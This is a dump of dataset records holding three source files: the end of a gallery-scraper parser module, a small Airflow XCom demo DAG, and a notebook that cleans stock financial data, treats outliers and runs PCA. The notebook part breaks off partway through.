constants.ge_api_url,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Adding gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n continue\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n link = link_from_gid_token_fjord(gallery_data['gid'], gallery_data['token'], False)\n internal_gallery_data.link = link\n\n banned_result, banned_reasons = self.general_utils.discard_by_gallery_data(internal_gallery_data.tags, internal_gallery_data.uploader)\n\n if banned_result:\n if not self.settings.silent_processing:\n logger.info(\n \"Skipping gallery link {}, discarded reasons: {}\".format(\n link,\n banned_reasons\n )\n )\n continue\n\n if wanted_filters:\n self.compare_gallery_with_wanted_filters(\n internal_gallery_data,\n link,\n wanted_filters,\n gallery_wanted_lists\n )\n if wanted_only and not gallery_wanted_lists[internal_gallery_data.gid]:\n continue\n\n if self.own_settings.use_ex_for_fjord:\n m = re.search(constants.default_fjord_tags, \",\".join(internal_gallery_data.tags))\n\n if m and self.own_settings.cookies:\n fjord_galleries.append(link_from_gid_token_fjord(gallery_data['gid'], gallery_data['token'], True))\n else:\n gallery_data_list.append(internal_gallery_data)\n else:\n gallery_data_list.append(internal_gallery_data)\n\n if self.own_settings.use_ex_for_fjord and fjord_galleries:\n fjord_galleries_data = self.get_values_from_gallery_link_list(fjord_galleries, True)\n\n if fjord_galleries_data:\n gallery_data_list.extend(fjord_galleries_data)\n\n self.pass_gallery_data_to_downloaders(gallery_data_list, gallery_wanted_lists)\n\n def post_gallery_processing(self, gallery_entry: 'Gallery', gallery_data: 'GalleryData'):\n\n extra_gal_data = gallery_data.extra_data\n\n galleries_to_add: dict[str, list[str]] = defaultdict(list)\n\n if self.own_settings.auto_process_newer:\n if 'current_gid' in extra_gal_data and 'current_key' in extra_gal_data:\n current_url = link_from_gid_token_fjord(extra_gal_data['current_gid'], extra_gal_data['current_key'])\n\n logger.info(\n \"Gallery: {} has current in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n current_url\n )\n )\n galleries_to_add[current_url] = []\n\n if self.own_settings.auto_process_first:\n if 'first_gid' in extra_gal_data and 'first_key' in extra_gal_data:\n first_url = link_from_gid_token_fjord(extra_gal_data['first_gid'], extra_gal_data['first_key'])\n\n logger.info(\n \"Gallery: {} has first in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n first_url\n )\n )\n galleries_to_add[first_url].extend(['--link-newer', str(gallery_entry.gid)])\n\n if self.own_settings.auto_process_parent:\n if 'parent_gid' in extra_gal_data and 'parent_key' in extra_gal_data:\n parent_url = link_from_gid_token_fjord(extra_gal_data['parent_gid'], extra_gal_data['parent_key'])\n\n logger.info(\n \"Gallery: {} has parent in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n parent_url\n )\n )\n galleries_to_add[parent_url].extend(['--link-child', str(gallery_entry.gid)])\n\n if self.settings.workers.web_queue and galleries_to_add:\n list_galleries_to_add = [[x] + galleries_to_add[x] for x in galleries_to_add.keys()]\n for gallery_to_add in list_galleries_to_add:\n self.settings.workers.web_queue.enqueue_args_list(gallery_to_add)\n\n def is_current_link_non_current(self, gallery_data: 'GalleryData') -> bool:\n if 'current_gid' in gallery_data.extra_data:\n return True\n return False\n\n\nAPI = (\n Parser,\n)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/providers/panda/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":25783,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"31133288793","text":"from airflow import DAG\nfrom datetime import datetime\nfrom airflow.operators import BashOperator, DummyOperator, PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom datetime import timedelta\n\n\ndef push_function(ti, **kwargs):\n \"\"\"\n Simple Python Function to push value\n :return:\n \"\"\"\n a = 1\n b = 2\n c = a + b\n ti.xcom_push(key='c', value=c)\n return a+b\n\n\ndef receive_function(ti, **kwargs):\n \"\"\"\n to receive the value from XCOM\n :param ti: cross function element\n :return:\n \"\"\"\n output = ti.xcom_pull(key='c', task_ids=['Xcom_Push'])\n print(output)\n\n\ndag_arguments = {\n 'Owner': 'Sai',\n 'depends_on_past': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5)\n}\n\ndag = DAG(\n dag_id='Xcom_Push_Pull',\n default_args=dag_arguments,\n description='A simple tutorial DAG',\n schedule_interval=timedelta(days=1),\n start_date=days_ago(2)\n)\n\ndummy_task = DummyOperator(\n task_id='Start',\n dag=dag\n)\n\npush_task = PythonOperator(\n task_id='Xcom_Push',\n python_callable=push_function,\n provide_context=True,\n dag=dag\n)\n\npull_task = PythonOperator(\n task_id='Xcom_Pull',\n python_callable=receive_function,\n provide_context=True,\n dag=dag\n)\n\ndummy_task >> push_task >> pull_task","repo_name":"saiprashanthts1995/Airflow_Project","sub_path":"Dags/xcom_push_pull.py","file_name":"xcom_push_pull.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32520263708","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport seaborn as sns\n\nimport missingno as msno\n\n# pd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport sklearn.preprocessing\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import recall_score, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.metrics import precision_score, auc, roc_auc_score, roc_curve, precision_recall_curve\n\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n\nfrom sklearn.linear_model import Ridge, Lasso\nfrom sklearn.feature_selection import RFE\n# from xgboost import XGBClassifier\n\nfrom sklearn.linear_model import LogisticRegression\nimport statsmodels.api as sm\nfrom sklearn import metrics\n\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.ensemble import GradientBoostingClassifier #GBM algorithm\n# Training the model on the train data\nfrom sklearn.linear_model import LogisticRegression\nimport statsmodels.api as sm\nfrom sklearn import metrics\n\n\n\nfrom scipy.stats.mstats import winsorize\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler \n\nfrom sklearn.decomposition import PCA\nfrom imblearn.over_sampling import SMOTE, RandomOverSampler as smot\nfrom imblearn.under_sampling import NearMiss, RandomUnderSampler\nfrom imblearn.combine import SMOTEENN, SMOTETomek\n\n\n# In[2]:\n\n\n# !pip install lazypredict\n\n\n# In[3]:\n\n\n# !pip uninstall scikit-learn -y\n\n\n# In[4]:\n\n\n# !pip install scikit-learn==0.23.1\n\n\n# In[5]:\n\n\n# import lazypredict\n\n\n# In[6]:\n\n\n# from lazypredict.Supervised import LazyClassifier\n\n\n# In[7]:\n\n\n# from lazypredict.Supervised import LazyClassifier\n# from sklearn.datasets import load_diabetes\n# from sklearn.model_selection import train_test_split\n# # from lazypredict.Supervised import LazyRegressor\n# # from sklearn import datasets\n# from sklearn.utils import shuffle\n# # import numpy as np\n\n\n# ### Reading CSV files\n\n# In[8]:\n\n\ndf_2014 = pd.read_csv(\"2014_Financial_Data.csv\")\ndf_2015 = pd.read_csv(\"2015_Financial_Data.csv\")\ndf_2016 = pd.read_csv(\"2016_Financial_Data.csv\")\ndf_2017 = pd.read_csv(\"2017_Financial_Data.csv\")\ndf_2018 = pd.read_csv(\"2018_Financial_Data.csv\")\n\n\n# In[9]:\n\n\nnasdaq = pd.read_csv(\"nasdaq.csv\")\n\n\n# In[10]:\n\n\nnasdaq.shape\n\n\n# In[11]:\n\n\nnasdaq.columns\n\n\n# In[12]:\n\n\nnasdaq.head()\n\n\n# In[13]:\n\n\nnasdaq.drop('Name', axis=1, inplace=True)\n\n\n# In[14]:\n\n\ndf_2014.shape\n\n\n# In[15]:\n\n\ndf_2015.shape\n\n\n# In[16]:\n\n\ndf_2016.shape\n\n\n# In[17]:\n\n\ndf_2017.shape\n\n\n# In[18]:\n\n\ndf_2018.shape\n\n\n# In[19]:\n\n\ndf_2014['Year'] = 2014\ndf_2015['Year'] = 2015\ndf_2016['Year'] = 2016\ndf_2017['Year'] = 2017\ndf_2018['Year'] = 2018\n\n\n# In[20]:\n\n\ndf_2014.columns\n\n\n# In[21]:\n\n\ndf_2014.rename(columns={'2015 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2015.rename(columns={'2016 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2016.rename(columns={'2017 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2017.rename(columns={'2018 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2018.rename(columns={'2019 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\n\n\n# In[22]:\n\n\ndf = pd.concat([df_2014, df_2015, df_2016, df_2017, df_2018], axis = 0)\n\n\n# In[23]:\n\n\ndf.shape\n\n\n# In[24]:\n\n\ndf.columns\n\n\n# In[25]:\n\n\ndf.head()\n\n\n# In[26]:\n\n\ndf.rename(columns={\"Unnamed: 0\": \"Symbol\"}, inplace=True)\n# df_2014.rename(columns={'2015 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\n\n\n# In[27]:\n\n\ndf = pd.merge(df, nasdaq, how=\"inner\", on=\"Symbol\")\n\n\n# In[28]:\n\n\ndf.shape\n\n\n# In[29]:\n\n\ndf.head()\n\n\n# In[30]:\n\n\ndf.Country.value_counts()\n\n\n# In[31]:\n\n\ndf.Country.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[32]:\n\n\n#Next_Year_Price_Var[%] +ve ---> class = 1, if -ve -----> class = 0\ndf.drop('Next_Year_Price_Var[%]', axis=1, inplace=True)\n\n\n# In[33]:\n\n\ndf.rename(columns={\"Symbol\":\"Name\"}, inplace=True)\n\n\n# In[34]:\n\n\ndf.Name.nunique()\n\n\n# In[35]:\n\n\ndf.shape\n\n\n# In[36]:\n\n\ndf.info\n\n\n# In[37]:\n\n\ndf.describe()\n\n\n# In[38]:\n\n\n## Removing \"Year\" because our future companies will have different years and it should not affect our final call\ndf.drop(\"Year\", axis=1, inplace=True)\n\n\n# In[39]:\n\n\n## Removing \"Name\" because our future companies will have different Name and it should not affect our final call\ndf.drop(\"Name\", axis=1, inplace=True)\n\n\n# In[40]:\n\n\ndf.head(2)\n\n\n# In[41]:\n\n\ndf.loc[(df.Country==\"United States\")].shape\n\n\n# In[42]:\n\n\ndf.loc[(df.Country==\"United States\")]\n\n\n# In[43]:\n\n\n# Selecting only United States\n\n\n# In[44]:\n\n\ndf = df.loc[(df.Country==\"United States\")]\n\n\n# In[45]:\n\n\ndf.drop('Country', axis=1, inplace=True)\n\n\n# ### Understanding Null Value Distribution\n\n# In[46]:\n\n\ndf.isnull().sum().sort_values(ascending=False)\n\n\n# In[47]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=False)\n\n\n# In[48]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=True).head(15)\n\n\n# In[49]:\n\n\n# all cols have some null values\nlen(df.isnull().any())\n\n\n# In[50]:\n\n\n# No columns with all null values\ndf.columns[df.isnull().all()]\n\n\n# In[51]:\n\n\n# Defining a funtion to add the count/frequency values as annotation to histogram.\ndef annotate_graph(ax):\n for bar in ax.patches: \n ax.annotate(format((bar.get_height()), '.0f'), \n (bar.get_x() + bar.get_width() / 2, bar.get_height()), \n ha='center', va='center', \n size=10, xytext=(0, 8), \n textcoords='offset points')\n return ax\n\n\n# In[52]:\n\n\n# Plotting histogram for the dataframe and columns having null values.\nplt.figure(figsize=(28,10))\n\nax = sns.histplot(round((df.isnull().sum()/len(df.index) * 100).sort_values(ascending=False), 2))\nax = annotate_graph(ax)\n\nax.set(xticks=np.arange(0,101))\nax.set(xlabel='Null value percentage', ylabel='Count of columns with null values')\nsns.despine()\nplt.tight_layout()\n\n\n# In[53]:\n\n\nmsno.matrix(df)\n\n\n# In[54]:\n\n\n# defining a function to get more than cutoff percent missing value\n\ndef get_missing_value_percentage(cutoff):\n y = pd.DataFrame( round((df.isnull().sum()/len(df.index) * 100).sort_values(ascending=False), 2))\n y.rename(columns={0:\"Percentage\"}, inplace=True)\n y2 = y[y.Percentage>cutoff]\n return y2\n\n\n# In[55]:\n\n\n# get columns with more than 70% missing values\ngreater_than_70 = get_missing_value_percentage(70)\n\n\n# In[56]:\n\n\nlen(greater_than_70)\n\n\n# In[57]:\n\n\ngreater_than_70\n\n\n# In[58]:\n\n\n# get columns with more than 50% missing values\ngreater_than_50 = get_missing_value_percentage(50)\n\n\n# In[59]:\n\n\nlen(greater_than_50)\n\n\n# In[60]:\n\n\ngreater_than_50\n\n\n# In[61]:\n\n\n# get columns with more than 20% missing values\ngreater_than_20 = get_missing_value_percentage(20)\ngreater_than_20\n\n\n# ### Removing Null Values\n\n# In[62]:\n\n\n# function to drop cols which have more than 20% null values\n\ndef remove_cols_with_nulls (df, threshold):\n myCol = list(df.columns)\n for col in myCol: \n percentage = (df[col].isnull().sum()/len(df[col]))*100\n if percentage>threshold:\n df.drop(col, axis=1, inplace=True)\n\n\n# In[63]:\n\n\ndf.shape\n\n\n# In[64]:\n\n\nremove_cols_with_nulls(df, 20)\n\n\n# In[65]:\n\n\ndf.shape\n\n\n# In[66]:\n\n\nlen(df.columns[(df.isnull().any())])\n\n\n# In[67]:\n\n\n# Deleting rows with any null value\ndf.dropna(how='all',axis=0, inplace=True) \n\n\n# In[68]:\n\n\n# Therefore, there is no row will all NULL values\ndf.shape\n\n\n# In[69]:\n\n\n# Deleting rows with any null value\ndf.dropna(how='any',axis=0, inplace=True) \n\n\n# In[70]:\n\n\ndf.shape\n\n\n# In[71]:\n\n\nmsno.matrix(df)\n\n\n# In[72]:\n\n\ndf.isnull().any().sum()\n\n\n# In[73]:\n\n\ndf.columns\n\n\n# In[74]:\n\n\ndf.select_dtypes('number')\n\n\n# In[75]:\n\n\ndf['R&D Expenses'].value_counts()\n\n\n# In[76]:\n\n\ndf.shape[0]\n\n\n# In[77]:\n\n\ndf['R&D Expenses'].value_counts(normalize=True).sort_values(ascending=False)[0]\n\n\n# In[78]:\n\n\n# more than 50% value of R&D expense is 0. Remove numeric cols with dominant values\n\n\n# In[79]:\n\n\ndf.operatingProfitMargin.value_counts().sort_values(ascending=False).iloc[0]\n\n\n# In[80]:\n\n\n#Code goes to except block when single value is met ---> which is SERIES and you cannot do simple indexing in SERIES\n\n\n# In[81]:\n\n\ncounter = 0\nfor col in list(df.select_dtypes('number').columns):\n try: \n val = df[col].value_counts(normalize=True).sort_values(ascending=False)[0]\n if(val>0.5):\n df.drop(col, axis=1, inplace=True)\n counter = counter+1\n except:\n val = df[col].value_counts(normalize=True).sort_values(ascending=False).iloc[0]\n if(val>0.5):\n df.drop(col, axis=1, inplace=True)\n counter = counter+1\n \n \nprint(\"Total Columns Deleted = \",counter)\n\n\n# In[82]:\n\n\ndf.shape\n\n\n# In[83]:\n\n\ndf.columns\n\n\n# In[84]:\n\n\ndf.select_dtypes(include='number')\n\n\n# In[85]:\n\n\ndf.select_dtypes(include='object')\n\n\n# In[86]:\n\n\ndf.select_dtypes(include='number').shape\n\n\n# In[87]:\n\n\ndf.select_dtypes(include='object').shape\n\n\n# In[88]:\n\n\ndf.select_dtypes(include='category').shape\n\n\n# In[89]:\n\n\ndf.shape\n\n\n# In[90]:\n\n\n# 155 cols ----> 154 number, 1 Object\n\n\n# In[91]:\n\n\ndf.Sector.value_counts()\n\n\n# In[92]:\n\n\nsector_list = list(df.Sector.unique())\n\n\n# In[93]:\n\n\nsector_list\n\n\n# In[94]:\n\n\npd.get_dummies(df.Sector, drop_first=True)\n\n\n# In[95]:\n\n\nSector_status = pd.get_dummies(df.Sector, drop_first=True)\n\n#Adding the result to the original housing dataframe\n\ndf = pd.concat([df, Sector_status], axis=1)\n\n\n# In[96]:\n\n\n# Droppig Sector Column as we are done with \ndf.drop(\"Sector\", axis=1, inplace=True)\n\n\n# In[97]:\n\n\ndf.shape\n\n\n# In[98]:\n\n\ndf.Energy.value_counts()\n\n\n# In[99]:\n\n\n# Sector Column will be dropped after Exploratory Data Analysis\n\n\n# In[100]:\n\n\ndf.head()\n\n\n# # Removing columns with single value\n\n# In[101]:\n\n\ndef removeSingleValue (col):\n length = len(df[col].value_counts())\n if (length<2):\n print(col)\n df.drop(col, axis=1, inplace=True)\n\n\n# In[102]:\n\n\nfor col in df.columns:\n removeSingleValue(col)\n\n\n# In[103]:\n\n\nnum_col = list(df.dtypes[df.dtypes !='object'].index)\n\n\n# In[104]:\n\n\nlen(num_col)\n\n\n# In[105]:\n\n\ndf.shape\n\n\n# ### Duplicate Row Checker\n\n# In[106]:\n\n\ndf.duplicated().sum()\n\n\n# In[107]:\n\n\n# Moving \"Class\" Column to end\ndf['Result'] = df.Class\ndf.drop(\"Class\", axis=1, inplace=True)\ndf = df.rename(columns={\"Result\":\"Class\"})\n\n\n# In[ ]:\n\n\n\n\n\n# In[108]:\n\n\ndf.head()\n\n\n# # Outlier Treatment\n\n# In[109]:\n\n\ndf.head()\n\n\n# ## Method 1 Standard Deviation Method\n# \n# Three standard deviations from the mean is a common cut-off in practice for identifying outliers in a Gaussian or Gaussian-like distribution. For smaller samples of data, perhaps a value of 2 standard deviations (95%) can be used, and for larger samples, perhaps a value of 4 standard deviations (99.9%) can be used.\n\n# In[110]:\n\n\ndf.shape\n\n\n# In[111]:\n\n\n# Extracting numerical columns from the telecom_df data frame.\nnumerical_cols = df.select_dtypes(include = np.number).columns.to_list()\n\n\n# In[112]:\n\n\n# calculate summary statistics\ndata = df[numerical_cols]\ndata_mean, data_std = np.mean(data), np.std(data)\n# identify outliers\ncut_off = data_std * 3\nlower, upper = data_mean - cut_off, data_mean + cut_off\n# identify outliers\noutliers = df[((df < lower) | (df > upper)).any(axis=1)]\nprint('Number of identified outliers: %d' % len(outliers))\n\n\n# In[113]:\n\n\n# remove outliers\noutliers_removed = df[~((df < lower) | (df > upper)).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed))\n\n\n# ## Method 2 IQR method\n# \n# The IQR can be used to identify outliers by defining limits on the sample values that are a factor k of the IQR below the 25th percentile or above the 75th percentile. The common value for the factor k is the value 1.5.\n\n# In[114]:\n\n\nQ1 = df.quantile(0.25)\nQ3 = df.quantile(0.75)\nIQR = Q3 - Q1\nprint(IQR)\n\n\n# In[115]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# ## Method 3: 99-1 percentile method\n\n# In[116]:\n\n\nQ1 = df.quantile(0.01)\nQ3 = df.quantile(0.99)\nIQR = Q3 - Q1\nprint(IQR)\n\n\n# In[117]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# In[118]:\n\n\n### We choose 99-1 percentile method for outlier treatment\ndf_99_1 = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\n\n\n# In[119]:\n\n\ndf_99_1.shape\n\n\n# ## Method 4: 95-5 percentile method\n\n# In[120]:\n\n\nQ1 = df.quantile(0.05)\nQ3 = df.quantile(0.95)\nIQR = Q3 - Q1\n\n\n# In[121]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# In[122]:\n\n\n### We choose 95-5 percentile method for outlier treatment\ndf_95_5 = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\n\n\n# In[123]:\n\n\ndf_95_5.shape\n\n\n# In[124]:\n\n\n# Selecting 99-1 percentile\n\n\n# In[125]:\n\n\ndf = df_99_1\n\n\n# # Observation\n# \n# We are losing a lot of data even if we perform 99-1 percentile outlier removal. Therefore, we need to explore other techniques\n\n# In[126]:\n\n\ndf.head()\n\n\n# In[127]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=False)\n\n\n# In[128]:\n\n\ndf.shape\n\n\n# # Winsorize\n\n# In[129]:\n\n\nsorted(sector_list)\n\n\n# In[130]:\n\n\ndf_winow = pd.DataFrame()\nfor col in df:\n if (col not in sector_list):\n df_winow[col] = winsorize(df[col], (0.1, 0.1))\n else:\n df_winow[col] = df[col].values\n\n\n# In[131]:\n\n\ndf_winow.shape\n\n\n# In[132]:\n\n\ndf['Communication Services'].value_counts()\n\n\n# In[133]:\n\n\ndf_winow.shape\n\n\n# In[134]:\n\n\ndf_winow\n\n\n# In[135]:\n\n\ndf_winow.Utilities.value_counts()\n\n\n# In[136]:\n\n\ndf_winow.Energy.value_counts()\n\n\n# In[137]:\n\n\nhig_neg_corr = list(df_winow.corr()['Class'].sort_values(ascending=True).index[0:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow[hig_neg_corr[0]], hue=\"Class\", data=df_winow, ax=ax0)\nsns.boxplot(df_winow[hig_neg_corr[1]], hue=\"Class\", data=df_winow, ax=ax1)\nsns.boxplot(df_winow[hig_neg_corr[2]], hue=\"Class\", data=df_winow, ax=ax2)\nsns.boxplot(df_winow[hig_neg_corr[3]], hue=\"Class\", data=df_winow, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[138]:\n\n\nhig_pos_corr = list(df_winow.corr()['Class'].sort_values(ascending=False).index[1:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow[hig_pos_corr[0]], hue=\"Class\", data=df_winow, ax=ax0)\nsns.boxplot(df_winow[hig_pos_corr[1]], hue=\"Class\", data=df_winow, ax=ax1)\nsns.boxplot(df_winow[hig_pos_corr[2]], hue=\"Class\", data=df_winow, ax=ax2)\nsns.boxplot(df_winow[hig_pos_corr[3]], hue=\"Class\", data=df_winow, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# ## 15 percentile - 85 percentile\n\n# In[139]:\n\n\ndf_winow2 = pd.DataFrame()\nfor col in df:\n if(col not in sector_list):\n df_winow2[col] = winsorize(df[col], (0.15, 0.15))\n if(col in sector_list):\n df_winow2[col] = df[col].values\n\n\n# In[140]:\n\n\ndf_winow2.shape\n\n\n# In[141]:\n\n\nhig_neg_corr = list(df_winow2.corr()['Class'].sort_values(ascending=True).index[0:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow2[hig_neg_corr[0]], hue=\"Class\", data=df_winow2, ax=ax0)\nsns.boxplot(df_winow2[hig_neg_corr[1]], hue=\"Class\", data=df_winow2, ax=ax1)\nsns.boxplot(df_winow2[hig_neg_corr[2]], hue=\"Class\", data=df_winow2, ax=ax2)\nsns.boxplot(df_winow2[hig_neg_corr[3]], hue=\"Class\", data=df_winow2, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[142]:\n\n\nhig_pos_corr = list(df_winow2.corr()['Class'].sort_values(ascending=False).index[1:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow2[hig_pos_corr[0]], hue=\"Class\", data=df_winow2, ax=ax0)\nsns.boxplot(df_winow2[hig_pos_corr[1]], hue=\"Class\", data=df_winow2, ax=ax1)\nsns.boxplot(df_winow2[hig_pos_corr[2]], hue=\"Class\", data=df_winow2, ax=ax2)\nsns.boxplot(df_winow2[hig_pos_corr[3]], hue=\"Class\", data=df_winow2, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[143]:\n\n\nfrom sklearn.feature_selection import VarianceThreshold\n\nvar_thr = VarianceThreshold(threshold = 0.15) #Removing both constant and quasi-constant\nvar_thr.fit(df_winow2)\n\nvar_thr.get_support()\n\n\n# In[144]:\n\n\nconcol = [column for column in df_winow2.columns \n if column not in df_winow2.columns[var_thr.get_support()]]\n\nfor features in concol:\n print(features)\n\n\n# In[145]:\n\n\nlen(concol)\n\n\n# In[146]:\n\n\ndf_winow2.shape\n\n\n# In[147]:\n\n\n# df_winow2.drop(concol, axis=1, inplace=True)\n\n\n# # Observation\n# \n# We get a balanced data with Winsorize 15-85\n\n# In[148]:\n\n\ndf = df_winow2\n\n\n# ## Train Test Split\n\n# In[149]:\n\n\nmy_cv = 5\n\n\n# In[150]:\n\n\nX = df.drop('Class', axis = 1)\ny = df[['Class']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[151]:\n\n\ny_train_reshape = pd.DataFrame(y_train.values.reshape(-1,1))\nprint(\"Counts of label '1': {}\".format((y_train_reshape==1).sum()[0]))\nprint(\"Counts of label '0': {} \\n\".format((y_train_reshape==0).sum()[0]))\n\ny_train_1 = (y_train_reshape==1).sum()[0]\nprint(\"Percentage of Profitable Company : {}% \\n\".format(round(y_train_1/len(y_train_reshape)*100,2)))\n\n\n# # Scalers\n\n# In[152]:\n\n\n#Importing the PCA module\n\npca = PCA(random_state=42)\npca_again = PCA(0.95)\n\n\n# ## MinMax Scaler\n\n# In[153]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\n\n# In[154]:\n\n\nscaler = MinMaxScaler()\n\n\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[155]:\n\n\nX_train_pca_mm = pca_again.fit_transform(X_train)\n\n\n# In[156]:\n\n\nX_train_pca_mm.shape\n\n\n# In[157]:\n\n\n# Tranforming X_Test\nX_test_pca_mm = pca_again.transform(X_test)\nX_test_pca_mm.shape\n\n\n# In[158]:\n\n\n#Doing the PCA on the train data\npca.fit(X_train)\n\n\n# In[159]:\n\n\n#Making the screeplot - plotting the cumulative variance against the number of components\nget_ipython().run_line_magic('matplotlib', 'inline')\nfig = plt.figure(figsize = (12,8))\nplt.vlines(x = X_train_pca_mm.shape[1],ymax = 1,ymin = 0,colors = 'r',linestyles = '--')\nplt.hlines(y = 0.95, xmax = 70,xmin = 0,colors = 'g',linestyles = '--')\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('number of components')\nplt.ylabel('cumulative explained variance')\n\nsns.despine()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[160]:\n\n\npca = PCA(n_components=5)\n\n\n# In[161]:\n\n\nscaler = MinMaxScaler()\n\n\n# In[162]:\n\n\nscaled_df=df_winow2.copy()\nscaled_df=pd.DataFrame(scaler.fit_transform(scaled_df), columns=scaled_df.columns)\npca_fit = pca.fit(scaled_df)\n\n\n# In[ ]:\n\n\n\n\n\n# In[163]:\n\n\nfig = plt.figure(figsize=(14,5))\nPC_values = np.arange(pca_fit.n_components_) + 1\n\nplt.plot(PC_values, pca_fit.explained_variance_ratio_, 'o-', linewidth=2, color='blue')\nplt.title('Scree Plot')\nplt.xlabel('Principal Component')\nplt.ylabel('Variance Explained')\n\nplt.show()\n\n\n# In[164]:\n\n\nprint(pca_fit.explained_variance_ratio_)\n\n\n# ## StandardScaler\n\n# In[ ]:\n\n\n\n\n\n# In[165]:\n\n\n#Importing the PCA module\n\npca = PCA(random_state=42)\npca_again = PCA(0.95)\n\n\n# In[166]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\n\n# In[167]:\n\n\nscaler = StandardScaler()\n\n\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[168]:\n\n\nX_train_pca_std = pca_again.fit_transform(X_train)\n\n\n# 